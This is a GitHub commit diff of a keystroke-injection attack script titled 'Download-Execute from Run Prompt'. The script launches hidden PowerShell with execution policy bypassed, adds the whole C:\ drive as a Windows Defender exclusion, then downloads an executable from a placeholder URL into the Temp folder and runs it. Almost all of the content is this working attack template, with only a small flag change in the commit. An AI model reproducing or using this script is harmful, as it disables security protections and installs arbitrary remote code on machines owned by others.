Update Download-Execute from Run Prompt.txt

This commit is contained in:
beigeworm
2023-06-25 14:04:44 +00:00
committed by GitHub
parent 271b603fbd
commit 3ca8c8ffd3

View File

@@ -15,7 +15,7 @@ DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1;
REM replace FILE_URL_HERE below.
STRING iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit
STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit
CTRL-SHIFT ENTER
DELAY 1500